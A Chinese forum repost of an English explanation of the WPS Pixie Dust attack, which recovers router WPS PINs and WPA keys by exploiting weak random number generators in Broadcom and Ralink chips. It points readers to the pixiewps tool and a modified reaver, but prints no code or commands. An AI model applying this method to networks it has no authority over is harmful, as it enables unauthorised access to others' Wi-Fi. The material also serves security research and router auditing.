少尉
- 注册时间
- 2011-5-20
- 金币
- 255 个
- 威望
- 0 个
- 荣誉
- 0 个
累计签到:6 天
连续签到:0 天
[LV.20]漫游旅程
|
本帖最后由 13715168054 于 2015-4-9 10:02 编辑
WPS Pixie Dust Attack (Offline WPS Attack)
A Kali member "Wiire" has released his tool "pixiewps!" It is available from Wiire's GitHub.
You can also download the modified version of reaver here.
Hello guys. I've been looking into the new WPS security flaw found by Dominique Bongard. All of the information I am providing here is not mine, all credit goes to Bongard and other sources listed at the bottom.
Here is a database with affected/non affected models
Background: Basically Dominique Bongard discovered that Broadcom eCos chips use a Pseudo Random Number Generator that is not entirely random; that is, we can easily brute force the state of the PRNG to gather a bunch of data that the router generates and is supposed to be secure. Ralink's implementation is even worse, however I haven't looked into it much yet. So basically, if we can find the state of the PRNG that generated the nonce, we can find the WPS PIN in one single try. This effectively destroys AP rate limiting tactics AND everything can be done within a matter of seconds.
The first thing we have to do is modify reaver so that once we receive an M3 message, the attack stops. We also need to make sure that we, the client, are the registrar, and the AP is the Enrollee.
The following information is known by all WPS enabled devices:
-Pseudo Random Number Generator used to make the public keys (g^AB mod p)
-g is the generator, A and B are private numbers of the Enrollee and Registrar respectively, and p is a prime modulus.
The following information is gathered from the M1 and M2 packets:
-N1 Enrollee Nonce
-PKR Public Key (Registrar Nonce) (g^B mod p)
-PKE Public Key (Enrollee Nonce) (g^A mod p)
The Authkey is derived from the KDK
The following information is gathered from the M3 packet:
-E-Hash1= HMAC (E-S1, PSK1, PKE, PKR)
-E-Hash2= HMAC (E-S2, PSK2, PKE, PKR)
Components: E-S1 and E-S2 are secret, 128-bit nonces generated right after the router generates its N1 Nonce. If we can brute force the state of the PRNG, then we can find out the E-S1 and E-S2 nonces.
PSK1 and PSK2 are the first and second halves of the router's pin. Many of you know that the router takes the 8 digit pin, and splits it in 2, not to mention the last digit of the second half is a checksum, so instead of 100,000,000 different pin combinations, we only have 10,000 + 1,000= 11,000 possible pins to brute force.
HMAC is a function that hashes all the data in parenthesis. The function is HMAC-SHA-256.
Conclusion:
So assuming already know the PKE, PKR, E-S1 and E-S2 (since we just brute forced them), we can run all the data through and basically just try every pin until we have a matching hash. When we are returned with a match, we can say "Ok, that last pin we used matched the hash from the M3 packet. That must be the pin." We do this for both PSK1 and PSK2 and with only 11,000 (20,000 if we don't want to calculate the checksum... won't make a difference in time) possibilities, it will take only a few seconds to compute everything. Now we can take the pin we just brute forced and toss it into reaver and the AP will say "Ok, you have the right pin, here are all my credentials," including the SSID, WPS Pin, and the WPA key.
If you find anything new or wish to correct me, please do and post it in the comments! I will try to respond and keep you updated as frequently as possible!
Here are all of my sources:
Dominique Bongard's Slide Presentation
Dominique Bongard's Video Presentation
Hack Forums Information
Top Hat Sec Information
Khan Academy Diffle-Hellman Key Exchange
Khan Academy Pseudo Random Number Generator Explaination
GitHub Leaked Broadcom random.c Function
WPS Background
Complete WPS Specification (PDF Download)
And I would like to give a special thanks to DataHead, Wiire, FrostyHacks and of course Dominique Bongard for all their help! Thank You!
|
|
[复制链接]
IP卡
狗仔卡
发表于 2015-4-8 20:31
显身卡